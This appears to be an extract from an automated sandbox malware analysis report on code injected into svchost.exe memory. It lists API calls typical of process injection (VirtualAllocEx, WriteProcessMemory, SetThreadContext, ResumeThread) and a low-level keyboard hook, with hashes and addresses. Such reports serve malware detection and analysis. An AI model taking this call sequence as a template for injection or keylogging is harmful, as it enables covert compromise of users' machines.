                                                                                        Memory Dump Source
                                                                                        • Source File: 00000027.00000002.623397158.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_39_2_54a0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3559483778-0
                                                                                        • Opcode ID: 06701f0146237a8f0baff64180a6ef4957c595430cb21dde65b92c875d07bcb7
                                                                                        • Instruction ID: 2772fbb48ddac68a01293dc025a39e06fb115464529b75025ddd162cc03c34ec
                                                                                        • Opcode Fuzzy Hash: 06701f0146237a8f0baff64180a6ef4957c595430cb21dde65b92c875d07bcb7
                                                                                        • Instruction Fuzzy Hash: 4421E3B5900249DFCB10CF9AD984BDEBBF4FB48320F10842AE919A7250D778A944CBA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph (rendered graph not reproduced; executed / not-executed block colouring lost in extraction)
                                                                                        • Function 54a5450, basic blocks 54a5450 to 54a5506
                                                                                        • SetThreadContext called from block 54a54b0-54a54dc; successors 54a54de-54a54e4 and 54a54e5-54a5506
                                                                                        APIs
                                                                                        • SetThreadContext.KERNELBASE(?,00000000), ref: 054A54CF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000027.00000002.623397158.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_39_2_54a0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContextThread
                                                                                        • String ID:
                                                                                        • API String ID: 1591575202-0
                                                                                        • Opcode ID: c3eebf9db52e83e1ec64a5e55688f1bf1686c1d997873df8f83f9832027c0e4c
                                                                                        • Instruction ID: f54e13b00b22a3c745d1b0d5cd47250417609fea6a9291fdbffcc0e074284640
                                                                                        • Opcode Fuzzy Hash: c3eebf9db52e83e1ec64a5e55688f1bf1686c1d997873df8f83f9832027c0e4c
                                                                                        • Instruction Fuzzy Hash: CB21F7B2D006199FCB10CFAAC9857DEFBF4BB48721F54816AD418B7740D778A9448FA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph (rendered graph not reproduced; executed / not-executed block colouring lost in extraction)
                                                                                        • Function 54a5510, basic blocks 54a5510 to 54a55c5
                                                                                        • ReadProcessMemory called from block 54a5510-54a559b; successors 54a559d-54a55a3 and 54a55a4-54a55c5
                                                                                        APIs
                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 054A558E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000027.00000002.623397158.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_39_2_54a0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessRead
                                                                                        • String ID:
                                                                                        • API String ID: 1726664587-0
                                                                                        • Opcode ID: e59dc4c6063f7ea7835881b9f905e18544127656ec26723016fecc48cd6fc5e2
                                                                                        • Instruction ID: 5ed0e0827083c968b81a6530043502873d66b1e6965e594ed8379b4361ad749f
                                                                                        • Opcode Fuzzy Hash: e59dc4c6063f7ea7835881b9f905e18544127656ec26723016fecc48cd6fc5e2
                                                                                        • Instruction Fuzzy Hash: D821F7B2900249DFCB10CF9AC984BDEBBF4FF48320F14842AE559A7250D378A644DFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph (rendered graph not reproduced; executed / not-executed block colouring lost in extraction)
                                                                                        • Function 54a5458, basic blocks 54a5458 to 54a5506
                                                                                        • SetThreadContext called from block 54a54b0-54a54dc; successors 54a54de-54a54e4 and 54a54e5-54a5506
                                                                                        APIs
                                                                                        • SetThreadContext.KERNELBASE(?,00000000), ref: 054A54CF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000027.00000002.623397158.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_39_2_54a0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContextThread
                                                                                        • String ID:
                                                                                        • API String ID: 1591575202-0
                                                                                        • Opcode ID: 303c7ff0b95a82ce42c0ff10f6c71fb369665dd075b7f3952854c3e60139f8db
                                                                                        • Instruction ID: e523f00176e610708c8aa4a21c7248e0c3ddd9bb4eb443dd1971706020e291b8
                                                                                        • Opcode Fuzzy Hash: 303c7ff0b95a82ce42c0ff10f6c71fb369665dd075b7f3952854c3e60139f8db
                                                                                        • Instruction Fuzzy Hash: F02106B2D006199FCB10CFAAC9847DEFBF4BB48720F14816AD818B7740D778A9448FA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph (rendered graph not reproduced; executed / not-executed block colouring lost in extraction)
                                                                                        • Function 54a5518, basic blocks 54a5518 to 54a55c5
                                                                                        • ReadProcessMemory called from block 54a5518-54a559b; successors 54a559d-54a55a3 and 54a55a4-54a55c5
                                                                                        APIs
                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 054A558E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000027.00000002.623397158.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_39_2_54a0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessRead
                                                                                        • String ID:
                                                                                        • API String ID: 1726664587-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        (rendered graph not preserved; function 54a5600-54a569d, basic block 54a5600-54a5680 calls VirtualAllocEx)
                                                                                        APIs
                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 054A5673
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000027.00000002.623397158.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_39_2_54a0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        (rendered graph not preserved; function 54a5608-54a569d, basic block 54a5608-54a5680 calls VirtualAllocEx)
                                                                                        APIs
                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 054A5673
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000027.00000002.623397158.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_39_2_54a0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        (rendered graph not preserved; function 54a57e0-54a5871, basic block 54a57e0-54a5854 calls ResumeThread)
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000027.00000002.623397158.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_39_2_54a0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        (rendered graph not preserved; function 54a57e8-54a5871, basic block 54a57e8-54a5854 calls ResumeThread)
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000027.00000002.623397158.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_39_2_54a0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Execution Graph

                                                                                        Execution Coverage:14.4%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:18
                                                                                        Total number of Limit Nodes:0
                                                                                        (rendered execution graph not preserved; graph nodes include calls to LoadLibraryA at 57641ca and SetWindowsHookExW at 576b634 / 576e438)

                                                                                        Control-flow Graph

                                                                                        (rendered graph not preserved; function 5764104-5764252, basic block 57641bb-5764207 calls LoadLibraryA)
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNELBASE(?), ref: 057641F7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000028.00000002.654680571.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_40_2_5760000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        (rendered graph not preserved; function 57621cc-5764252, basic block 57641bb-5764207 calls LoadLibraryA)
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNELBASE(?), ref: 057641F7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000028.00000002.654680571.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_40_2_5760000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        (rendered graph not preserved; function 576b634-576e4ee, basic block 576e48e-576e4c0 calls SetWindowsHookExW)
                                                                                        APIs
                                                                                        • SetWindowsHookExW.USER32(0000000D,00000000,?,?), ref: 0576E4B3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000028.00000002.654680571.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_40_2_5760000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: HookWindows
                                                                                        • String ID:
                                                                                        • API String ID: 2559412058-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        (rendered graph not preserved; function 576e431-576e4ee, basic block 576e48e-576e4c0 calls SetWindowsHookExW)
                                                                                        APIs
                                                                                        • SetWindowsHookExW.USER32(0000000D,00000000,?,?), ref: 0576E4B3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000028.00000002.654680571.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_40_2_5760000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: HookWindows
                                                                                        • String ID:
                                                                                        • API String ID: 2559412058-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000028.00000002.650020775.00000000015ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 015ED000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_40_2_15ed000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000028.00000002.650020775.00000000015ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 015ED000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_40_2_15ed000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000028.00000002.650158589.00000000015FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015FD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_40_2_15fd000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000028.00000002.650020775.00000000015ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 015ED000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_40_2_15ed000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000028.00000002.650020775.00000000015ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 015ED000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_40_2_15ed000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b3d282c62180620417641dd9b9a0e49e7b7255b4f86f8dc055538552fd58bc37
                                                                                        • Instruction ID: d512887c7a7e6e2fa5ec4e14e2cb982840845dceb96140752f8d3d8645d6d2d1
                                                                                        • Opcode Fuzzy Hash: b3d282c62180620417641dd9b9a0e49e7b7255b4f86f8dc055538552fd58bc37
                                                                                        • Instruction Fuzzy Hash: 6911D376904280CFDB16CF54D9C4B1ABFB1FB84324F24C6AAD8090F616C33AD456CBA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000028.00000002.650158589.00000000015FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015FD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_40_2_15fd000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f825cc49a36603e58b05d30dbcded4ff69a659c0c942629433790640a090c2f4
                                                                                        • Instruction ID: eedcc9514dcdc1cfc55a53ae4c6700cdea7ddb5058b580164a291e74e954cf92
                                                                                        • Opcode Fuzzy Hash: f825cc49a36603e58b05d30dbcded4ff69a659c0c942629433790640a090c2f4
                                                                                        • Instruction Fuzzy Hash: 8E11BE79504280CFDB12CF54D5C4B19BBB1FB84324F24CAAED9494F656C33AD44ACBA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%